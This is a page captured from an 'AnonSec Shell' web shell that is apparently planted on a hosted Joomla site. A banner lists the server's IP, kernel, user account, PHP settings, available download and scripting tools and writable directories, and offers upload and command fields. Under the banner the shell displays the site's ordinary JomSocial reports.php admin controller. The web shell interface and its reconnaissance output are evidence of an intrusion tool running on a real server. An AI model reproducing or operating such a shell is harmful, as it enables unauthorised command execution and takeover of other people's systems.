AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.112
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/coopiak/plats-individuels/lyon/administrator/components/com_community/controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/coopiak/plats-individuels/lyon/administrator/components/com_community/controllers/reports.php
<?php
/**
* @copyright (C) 2013 iJoomla, Inc. - All rights reserved.
* @license GNU General Public License, version 2 (http://www.gnu.org/licenses/gpl-2.0.html)
* @author iJoomla.com <webmaster@ijoomla.com>
* @url https://www.jomsocial.com/license-agreement
* The PHP code portions are distributed under the GPL license. If not otherwise stated, all images, manuals, cascading style sheets, and included JavaScript *are NOT GPL, and are released under the IJOOMLA Proprietary Use License v1.0
* More info at https://www.jomsocial.com/license-agreement
*/
// Disallow direct access to this file
defined('_JEXEC') or die('Restricted access');

/**
 * JomSocial Component Controller
 */
class CommunityControllerReports extends CommunityController
{
	public function __construct()
	{
		parent::__construct();
	}


	/**
	 * Method to display the specific view
	 *
	 **/
	public function display($cachable = false, $urlparams = array())
	{
        $jinput = JFactory::getApplication()->input;

		$viewName	= $jinput->get( 'view' , 'community' );

		// Set the default layout and view name
		$layout		= $jinput->get( 'layout' , 'default' );

		// Get the document object
		$document	= JFactory::getDocument();

		// Get the view type
		$viewType	= $document->getType();

		// Get the view
		$view		= $this->getView( $viewName , $viewType );

		$model		= $this->getModel( $viewName );

		if( $model )
		{
			$view->setModel( $model , $viewName );
		}

		//$model		=& $this->getModel( 'Reporters' );
		$model		= $this->getModel( 'Reports' );

		$view->setModel( $model );

		//add reporter model
		$modelReporter		= $this->getModel( 'Reporters' );
		$view->setModel( $modelReporter );

		// Set the layout
		$view->setLayout( $layout );

		// Display the view
		$view->display();

		// Display Toolbar. View must have setToolBar method
		if( method_exists( $view , 'setToolBar') )
		{
			$view->setToolBar();
		}
	}

	public function removeReport()
	{
		$mainframe	= JFactory::getApplication();
		$jinput 	= $mainframe->input;
		$ids		= $jinput->get('cid', array(), 'array') ;
		$count		= count($ids);

		$row		= JTable::getInstance( 'Reports', 'CommunityTable' );

		foreach( $ids as $id )
		{
			$row->load( $id );
			if( !$row->deleteChilds() || !$row->delete( $id ) )
			{
				// If there are any error when deleting, we just stop and redirect user with error.
				$message	= JText::_('COM_COMMUNITY_REPORTS_DELETE_ERROR');
				return $this->setRedirect( 'index.php?option=com_community&view=reports' , $message, 'error');

			}
		}
		$message	= JText::sprintf( 'COM_COMMUNITY_REPORT_SUCCESSFULLY_REMOVE_COUNT' , $count );
		$this->setRedirect( 'index.php?option=com_community&view=reports' , $message, 'message' );
	}

	/**
	 * Ajax functiion to handle ajax calls
	 */
	public function ajaxPerformAction( $actionId, $ignore = 0 )
	{
		$objResponse	= new JAXResponse();
		$output			= '';

		// Require Jomsocial core lib
		require_once( JPATH_ROOT . '/components/com_community/libraries/core.php' );

		$language	= JFactory::getLanguage();

		$language->load( 'com_community' , JPATH_ROOT );

		// Get the action data
		$action	= JTable::getInstance( 'ReportsActions' , 'CommunityTable' );
		$action->load( $actionId );

		// Get the report data
		$report	= JTable::getInstance( 'Reports' , 'CommunityTable' );
		$report->load( $action->reportid );

		$actions    =	'<input type="button" class="btn btn-inverse btn-mini pull-left" onclick="cWindowHide(); location.reload();" value="' . JText::_('COM_COMMUNITY_CLOSE') . '"/>';

		if( $ignore != 0 )
		{
			$report->status	= 2;
			$report->store();
			$output	    =	JText::_('COM_COMMUNITY_REPORTS_IGNORED_MESSAGE');

			$objResponse->addAssign( 'cWindowContent' , 'innerHTML' , $output);
			$objResponse->addScriptCall('cWindowActions', $actions);

			return $objResponse->sendResponse();
		}


		$method		= explode( ',' , $action->method );
		$args		= explode( ',' , $action->parameters );

		if( is_array( $method ) && $method[0] != 'plugins' )
		{
			$controller	= strtolower( $method[0] );

			require_once( JPATH_ROOT . '/components/com_community/controllers/controller.php' );
			require_once( JPATH_ROOT . '/components/com_community/controllers/'. $controller . '.php' );

			$controller	= ucfirst( $controller );
			$controller	= 'Community' . $controller . 'Controller';
			$controller	= new $controller();

			try {
				$output	= call_user_func_array( array( &$controller , $method[1] ) , $args );
			} catch (Exception $e) {
				$output = false;
			}
		}
		else if( is_array( $method ) && $method[0] == 'plugins' )
		{
			// Application method calls
			$element	= strtolower( $method[1] );

			require_once( CPluginHelper::getPluginPath('community',$element) .'/'. $element . '.php' );

			$className	= 'plgCommunity' . JString::ucfirst( $element );

			try {
				$output	= call_user_func_array( array( $className , $method[2] ) , $args );
			} catch (Exception $e) {
				$output = false;
			}
		}
		
		// ask for delete if reported item not found or deleted
		if ($output == false) {
			$output = JText::_('COM_COMMUNITY_REPORTS_NOT_FOUND');
			$actions = '<input type="button" class="btn btn-mini pull-left" onclick="jQuery(\'input[type=checkbox]\').each(function(){ this.checked = this.value == ' . $action->reportid . '; }); Joomla.submitbutton(\'removeReport\');" value="' . JText::_('COM_COMMUNITY_YES') . '"/>';
			$actions .= '<input type="button" class="btn btn-inverse btn-mini pull-left" onclick="cWindowHide();" value="' . JText::_('COM_COMMUNITY_NO') . '"/>';
			$objResponse->addAssign( 'cWindowContent' , 'innerHTML' , $output);
			$objResponse->addScriptCall('cWindowActions', $actions);

			return $objResponse->sendResponse();
		}

		$objResponse->addAssign( 'cWindowContent' , 'innerHTML' , $output);
		$objResponse->addScriptCall('cWindowActions', $actions);

		if($report->status ==1 )
		{
			$report->status = 0;
		}
		else
		{
			$report->status	= 1;
		}

		$report->store();

		return $objResponse->sendResponse();
	}

	public function purgeProcessed()
	{
		$mainframe	= JFactory::getApplication();
		$model		=& $this->getModel( 'Reports' );

		if( $model->purgeProcessed() )
		{
			$message	= JText::_('COM_COMMUNITY_PROCESSED_REPORTS_PURGE_ERROR');

		}
		else
		{
			$message	= JText::_('COM_COMMUNITY_PROCESSED_REPORTS_PURGE_ERROR');
		}

		$mainframe->enqueueMessage($message);
		$mainframe->redirect( 'index.php?option=com_community&view=reports' );
	}
}

Anon7 - 2022
AnonSec Team